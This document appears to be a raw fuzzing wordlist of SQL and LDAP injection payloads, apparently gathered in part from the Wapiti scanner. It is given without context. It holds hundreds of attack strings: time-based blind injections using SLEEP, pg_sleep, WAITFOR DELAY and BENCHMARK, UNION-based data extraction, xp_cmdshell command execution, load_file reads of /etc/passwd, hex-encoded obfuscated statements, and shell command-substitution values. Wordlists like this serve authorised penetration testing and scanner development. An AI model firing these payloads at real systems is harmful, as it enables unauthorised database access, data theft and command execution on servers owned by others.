-1'
-1)'
')-- 2
')/*
' -
'#
" --
" #
"/*
\'
'-- -
'--
+--+
/^.*1'--+-.*$/
/*!500001'--+-*/
'--/**/-
'--/*--*/-
'--/*&a=*/-
'--/*1337*/-
'--/**_**/-
'--%0A-
'--%0b-
'--%0d%0A-
'--%23%0A-
'--%23foo%0D%0A-
'--%23foo*%2F*bar%0D%0A-
'--#qa%0A#%0A-
/*!20000%0d%0a1'--+-*/
/*!blobblobblob%0d%0a1'--+-*/
'||DMBS_PIPE.RECEIVE_MESSAGE(CHR(98))||CHR(98)||CHR(98),15||'
)(&
)(|(&
)(|())%00
)(&)
)(!(&(|
%
{}
[]

')) or sleep(5)='
;waitfor delay '0:0:15'--
);waitfor delay '0:0:15'--
';waitfor delay '0:0:15'--
";waitfor delay '0:0:15'--
');waitfor delay '0:0:15'--
");waitfor delay '0:0:15'--
));waitfor delay '0:0:15'--
) OR SLEEP(15)=0 LIMIT 1--
' OR SLEEP(15)=0 LIMIT 1--
') OR SLEEP(15)=0 LIMIT 1--
)) OR SLEEP(15)=0 LIMIT 1--
' or pg_sleep(15)--
(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
' AND (SELECT 6377 FROM (SELECT(SLEEP(15)))hLTl)--
; execute immediate 'sel' || 'ect us' || 'er'
' WAITFOR DELAY '0:0:15'--
';WAITFOR DELAY '0:0:15'--
";waitfor delay '0:0:10'--
1) or pg_sleep(10)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
" or sleep(10)#
pg_sleep(10)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
insert
1) or sleep(10)#
; exec xp_regread
*|
@var select @var as var into temp end --
(||6)
# from wapiti
1 waitfor delay '0:0:10'--
UNION ALL SELECT
) or sleep(10)='
)) or benchmark(10000000,MD5(1))#
21 %
));waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1 or sleep(10)#
and 1 in (select var from temp)--
--
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(10)--
x' AND email IS NULL; --
&
admin' or '
or 'unusual' = 'unusual'
//
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:10'--
||6
%2A%28%7C%28objectclass%3D%2A%29%29
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
x' AND members.email IS NULL; --
and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
 'sleep 50'
1)) or pg_sleep(10)--
/**/or/**/1/**/=/**/1
union all select @@version--
,@variable
(sqlattempt2)
or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
 $(sleep 50)
||UTL_HTTP.REQUEST
or pg_sleep(10)--
") or sleep(10)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
) or pg_sleep(15)--
union select
or sleep(15)#
select * from information_schema.tables--
declare @s varchar(22) select @s =
or 2 between 1 and 3
|
or sleep(15)='
having
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
char%4039%41%2b%40SELECT
order by
bfilename
having 1=1--
) or benchmark(10000000,MD5(1))#
or username like char(37);
;waitfor delay '0:0:15'--
x' AND userid IS NULL; --
*/*
(select top 1
or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:15'--
-- &password=
group by userid having 1=1--
; exec master..xp_cmdshell
")) or sleep(15)="
0x730065006c0065006300740020004000400076006500 ...
") or pg_sleep(15)--
exec sp
29 %
(
1 or pg_sleep(10)--
uni/**/on sel/**/ect
)) or pg_sleep(10)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
&apos; OR
declare @q nvarchar (200) select @q = 0x770061 ...
; exec ('sel' + 'ect us' + 'er')
/
declare @q nvarchar (4000) select @q =
||'6
)
1)) or sleep(10)#
select name from syscolumns where id = (sele ...
*(|(mail=*))
password:*/=1--
);waitfor delay '0:0:10'--
to_timestamp_tz
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
)) or sleep(10)='
 or 1 in (select @@version)--
sqlvuln;
union select * from users where login = char ...
28 %
@variable
//*
%2A%7C
")) or pg_sleep(10)--
?
!
'
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
;SELECT *
<>"'%;)(&+
'sqlattempt1
%28
%29
%26
%21
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'XOR(if(now()=sysdate(),sleep(15),0))XOR
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
(select*from(select(if(1=1,sleep(15),false)))a)
(select*from(select(sleep(15)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2+%2b+((SELECT+1+FROM+(SELECT+SLEEP(15))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(15))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(15))A)))OR%22*%2f
 OR SLEEP(15)=0 LIMIT 1--
) OR SLEEP(15)=0 LIMIT 1--
' OR SLEEP(15)=0 LIMIT 1--
') OR SLEEP(15)=0 LIMIT 1--
)) OR SLEEP(15)=0 LIMIT 1--
 SELECT SLEEP(15)--
sleep(15)#
 or sleep(15)#
" or sleep(15)#
' or sleep(15)#
" or sleep(15)="
' or sleep(15)='
) or sleep(15)#
") or sleep(15)="
') or sleep(15)='
1)) or sleep(15)#
")) or sleep(15)="
$(sleep 15)
$(sleep 15; echo )
')) or sleep(15)='
 or pg_sleep(15)--
" or pg_sleep(15)--
' or pg_sleep(15)--
) or pg_sleep(15)--
") or pg_sleep(15)--
') or pg_sleep(15)--
pg_sleep(15)--
SLEEP(15)/*' or SLEEP(15) or '" or SLEEP(15) or "*/
1 or SLEEP(15)#
" or SLEEP(15)#
' or SLEEP(15)#
" or SLEEP(15)="
' or SLEEP(15)='
) or SLEEP(15)#
") or SLEEP(15)="
') or SLEEP(15)='
1)) or SLEEP(15)#
")) or SLEEP(15)="
')) or SLEEP(15)='
;waitfor delay '0:0:15'--
);waitfor delay '0:0:15'--
';waitfor delay '0:0:15'--
";waitfor delay '0:0:15'--
');waitfor delay '0:0:15'--
");waitfor delay '0:0:15'--
));waitfor delay '0:0:15'--
'));waitfor delay '0:0:15'--
"));waitfor delay '0:0:15'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
1 or pg_SLEEP(15)--
" or pg_SLEEP(15)--
1) or pg_SLEEP(15)--
") or pg_SLEEP(15)--
') or pg_SLEEP(15)--
1)) or pg_SLEEP(15)--
")) or pg_SLEEP(15)--
')) or pg_SLEEP(15)--
AND (SELECT * FROM (SELECT(SLEEP(15)))bAKL) AND 'vRxe'='vRxe
' AND (SELECT * FROM (SELECT(SLEEP(15)))bAKL) AND 'vRxe'='vRxe
 AND (SELECT * FROM (SELECT(SLEEP(15)))bAKL) AND 'vRxe'='vRxe
SLEEP(15)#
SLEEP(15)--
SLEEP(15)="
SLEEP(15)='
or SLEEP(15)
or SLEEP(15)#
or SLEEP(15)--
or SLEEP(15)="
or SLEEP(15)='
waitfor delay '00:00:05'
' or benchmark(50000000,MD5(1))
' or benchmark(50000000,MD5(1))--
' or benchmark(50000000,MD5(1))#
' or pg_SLEEP(15)
' or pg_SLEEP(15)--
' or pg_SLEEP(15)#
'\"
' AnD SLEEP(15)
' AnD SLEEP(15)--
' AnD SLEEP(15)#
&&SLEEP(15)
&&SLEEP(15)--
&&SLEEP(15)#
' AnD SLEEP(15) ANd '1
'&&SLEEP(15)&&'1
 ORDER BY SLEEP(15)
'+(select*from(select(sleep(10)))a)+'
'+(SELECT * FROM (SELECT(SLEEP(15)))ecMj)
'+(SELECT * FROM (SELECT(SLEEP(15)))ecMj)#
'+(SELECT * FROM (SELECT(SLEEP(15)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(15) + '
' RANDOMBLOB(500000000/2)
' AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
' OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
 AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
 OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
